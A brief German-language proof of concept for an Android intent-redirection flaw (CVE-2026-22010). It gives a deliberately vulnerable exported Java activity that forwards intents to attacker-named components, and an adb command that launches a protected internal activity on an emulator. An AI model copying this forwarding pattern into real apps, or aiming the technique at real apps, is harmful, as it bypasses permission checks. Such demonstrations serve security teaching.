
Proof-of-Concept für CVE-2026-22010 Android Intent-Redirection: demonstriert eine exportierte Aktivität, die Intents an angreiferkontrollierte interne Komponenten weiterleitet, Sicherheitsprüfungen umgeht, mit anfälligem Java-Code und adb-Exploit-Schritten.
// VulnActivity.java - Exported activity that forwards intents
public class VulnActivity extends Activity {
@Override
protected void onCreate(Bundle b) {
super.onCreate(b);
Intent incoming = getIntent();
// Retrieve target component from extras
String targetPkg = incoming.getStringExtra("pkg");
String targetCls = incoming.getStringExtra("cls");
Intent forward = new Intent();
forward.setClassName(targetPkg, targetCls);
// Copy all extras from original intent
forward.putExtras(incoming);
startActivity(forward);
}
}
Eine exportierte Android-Activity leitet eingehende Intents blind an eine Komponente weiter, die in den Extras des Intents angegeben ist. Ein Angreifer kann einen Intent konstruieren, der die App dazu veranlasst, eine geschützte interne Activity mit vom Angreifer kontrollierten Daten zu starten und dabei Berechtigungsprüfungen zu umgehen.
Stellen Sie die verwundbare App auf einem Android-Emulator bereit. Senden Sie einen Intent über adb:
adb shell am start -n com.example/.VulnActivity --es pkg com.example.internal --es cls com.example.SecretActivity
Die interne Activity wird ohne entsprechende Berechtigungen gestartet.